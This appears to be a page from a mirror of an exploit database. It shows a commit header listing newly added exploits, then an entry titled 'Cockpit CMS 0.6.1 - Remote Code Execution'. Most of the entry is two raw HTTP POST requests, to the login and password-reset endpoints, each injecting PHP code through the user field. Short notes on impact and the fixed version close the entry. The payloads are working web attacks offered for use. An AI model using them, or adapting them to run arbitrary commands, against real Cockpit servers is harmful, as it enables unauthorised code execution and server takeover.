62b3c868cf
7 changes to exploits/shellcodes iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information) ECSIMAGING PACS 6.21.5 - Remote code execution Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution Cockpit CMS 0.6.1 - Remote Code Execution Curfew e-Pass Management System 1.0 - Stored XSS ECSIMAGING PACS 6.21.5 - SQL injection CRUD Operation 1.0 - Multiple Stored XSS
34 lines
No EOL
1 KiB
Text
34 lines
No EOL
1 KiB
Text
# Cockpit CMS 0.6.1 - Remote Code Execution
|
|
# Product: Cockpit CMS (https://getcockpit.com)
|
|
# Version: Cockpit CMS < 0.6.1
|
|
# Vulnerability Type: PHP Code Execution
|
|
# Exploit Author: Rafael Resende
|
|
# Attack Type: Remote
|
|
# Vulnerability Description
|
|
# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.
|
|
|
|
# Exploit Login
|
|
POST /auth/check HTTP/1.1
|
|
Host: example.com
|
|
User-Agent: Mozilla/5.0
|
|
Content-Type: application/json; charset=UTF-8
|
|
Content-Length: 52
|
|
Origin: https://example.com
|
|
|
|
{"auth":{"user":"test'.phpinfo().'","password":"b"}}
|
|
|
|
# Exploit Password reset
|
|
POST /auth/requestreset HTTP/1.1
|
|
Host: example.com
|
|
User-Agent: Mozilla/5.0
|
|
Content-Type: application/json; charset=UTF-8
|
|
Content-Length: 28
|
|
Origin: https://example.com
|
|
|
|
{"user":"test'.phpinfo().'"}
|
|
|
|
## Impact
|
|
Allows attackers to execute malicious codes to get access to the server.
|
|
|
|
## Fix
|
|
Update to versions >= 0.6.1 |